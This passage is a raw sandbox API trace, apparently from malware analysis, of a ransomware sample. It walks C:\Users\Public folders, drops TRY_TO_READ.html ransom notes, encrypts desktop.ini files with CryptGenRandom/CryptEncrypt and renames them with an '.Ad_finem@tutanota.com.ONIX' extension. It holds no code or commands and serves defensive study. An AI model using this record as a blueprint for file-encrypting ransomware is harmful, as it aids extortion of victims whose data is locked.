lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.612] WriteFile (in: hFile=0x4f8, lpBuffer=0x4e1b68*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesWritten=0x367f44c*=0x17c, lpOverlapped=0x0) returned 1 [0122.613] UnlockFile (hFile=0x4f8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.613] CloseHandle (hObject=0x4f8) returned 1 [0122.614] GetProcessHeap () returned 0x410000 [0122.614] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.614] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\music\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.617] GetProcessHeap () returned 0x410000 [0122.617] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46e9d8 | out: hHeap=0x410000) returned 1 [0122.617] FindNextFileW (in: hFindFile=0x4e0b80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0122.617] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\music\\sample music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8 [0122.620] FindNextFileW (in: hFindFile=0x4e0b80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32991270, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x52932b10, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.621] FindNextFileW (in: hFindFile=0x4e0b80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32991270, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x52932b10, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.621] CloseHandle (hObject=0x3cc) returned 1 [0122.621] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.621] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x2, wMilliseconds=0x5)) [0122.621] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.621] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.621] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.621] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Public\\Pictures9c354ca09c354b444c.lock") returned 48 [0122.621] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures9c354ca09c354b444c.lock" (normalized: "c:\\users\\public\\pictures9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.622] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.622] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4ca8 [0122.622] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Pictures\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0bc0 [0122.622] FindNextFileW (in: hFindFile=0x4e0bc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.622] FindNextFileW (in: hFindFile=0x4e0bc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.622] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4fc [0122.623] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.623] LockFile (hFile=0x4fc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17c, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.623] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.623] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.623] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.623] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.623] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini", dwFileAttributes=0x80) returned 1 [0122.623] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\desktop.ini") returned 37 [0122.623] GetProcessHeap () returned 0x410000 [0122.623] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xba) returned 0x473050 [0122.623] lstrcpyW (in: lpString1=0x473050, lpString2="C:\\\\Users\\Public\\Pictures\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Pictures\\desktop.ini") returned="C:\\\\Users\\Public\\Pictures\\desktop.ini" [0122.623] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.623] GetFileSizeEx (in: hFile=0x4fc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=380) returned 1 [0122.623] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x17c [0122.624] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.624] GetProcessHeap () returned 0x410000 [0122.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.624] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.624] WriteFile (in: hFile=0x4fc, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.626] WriteFile (in: hFile=0x4fc, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.627] WriteFile (in: hFile=0x4fc, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.628] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17c) returned 0x46a198 [0122.628] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17c) returned 0x4e1b68 [0122.628] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.628] ReadFile (in: hFile=0x4fc, lpBuffer=0x46a198, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a198*, lpNumberOfBytesRead=0x367f44c*=0x17c, lpOverlapped=0x0) returned 1 [0122.628] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.628] WriteFile (in: hFile=0x4fc, lpBuffer=0x4e1b68*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesWritten=0x367f44c*=0x17c, lpOverlapped=0x0) returned 1 [0122.630] UnlockFile (hFile=0x4fc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.630] CloseHandle (hObject=0x4fc) returned 1 [0122.631] GetProcessHeap () returned 0x410000 [0122.631] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.631] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\pictures\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.634] GetProcessHeap () returned 0x410000 [0122.634] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0122.634] FindNextFileW (in: hFindFile=0x4e0bc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0122.634] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\pictures\\sample pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0122.638] FindNextFileW (in: hFindFile=0x4e0bc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32991270, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x52958c70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.638] FindNextFileW (in: hFindFile=0x4e0bc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32991270, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x52958c70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.638] CloseHandle (hObject=0x3cc) returned 1 [0122.638] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.638] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x2, wMilliseconds=0x15)) [0122.638] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.638] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.638] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.638] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Public\\Recorded TV9c354ca09c354b444c.lock") returned 51 [0122.638] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV9c354ca09c354b444c.lock" (normalized: "c:\\users\\public\\recorded tv9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.639] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.639] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.639] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4d38 [0122.639] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x329b73d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x329b73d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0c00 [0122.639] FindNextFileW (in: hFindFile=0x4e0c00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x329b73d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x329b73d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.639] FindNextFileW (in: hFindFile=0x4e0c00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.640] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x500 [0122.640] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.641] LockFile (hFile=0x500, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x50, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.641] SetFilePointerEx (in: hFile=0x500, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.641] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.641] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.641] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.641] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini", dwFileAttributes=0x80) returned 1 [0122.641] lstrlenW (lpString="C:\\\\Users\\Public\\Recorded TV\\desktop.ini") returned 40 [0122.641] GetProcessHeap () returned 0x410000 [0122.641] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x473050 [0122.641] lstrcpyW (in: lpString1=0x473050, lpString2="C:\\\\Users\\Public\\Recorded TV\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Recorded TV\\desktop.ini") returned="C:\\\\Users\\Public\\Recorded TV\\desktop.ini" [0122.641] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Recorded TV\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.641] GetFileSizeEx (in: hFile=0x500, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=80) returned 1 [0122.641] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x50 [0122.641] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.641] GetProcessHeap () returned 0x410000 [0122.641] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.641] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.641] WriteFile (in: hFile=0x500, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.645] WriteFile (in: hFile=0x500, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.646] WriteFile (in: hFile=0x500, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.647] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b588 [0122.647] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b5e0 [0122.647] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.647] ReadFile (in: hFile=0x500, lpBuffer=0x45b588, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x45b588*, lpNumberOfBytesRead=0x367f44c*=0x50, lpOverlapped=0x0) returned 1 [0122.647] SetFilePointer (in: hFile=0x500, lDistanceToMove=-80, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.647] WriteFile (in: hFile=0x500, lpBuffer=0x45b5e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x45b5e0*, lpNumberOfBytesWritten=0x367f44c*=0x50, lpOverlapped=0x0) returned 1 [0122.648] UnlockFile (hFile=0x500, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x50, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.648] CloseHandle (hObject=0x500) returned 1 [0122.649] GetProcessHeap () returned 0x410000 [0122.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.649] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.652] GetProcessHeap () returned 0x410000 [0122.652] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0122.652] FindNextFileW (in: hFindFile=0x4e0c00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0122.652] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\recorded tv\\sample media\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x500 [0122.655] FindNextFileW (in: hFindFile=0x4e0c00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329b73d0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x329b73d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x329b73d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.655] FindNextFileW (in: hFindFile=0x4e0c00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329b73d0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x329b73d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x329b73d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.655] CloseHandle (hObject=0x3cc) returned 1 [0122.655] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.655] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x2, wMilliseconds=0x24)) 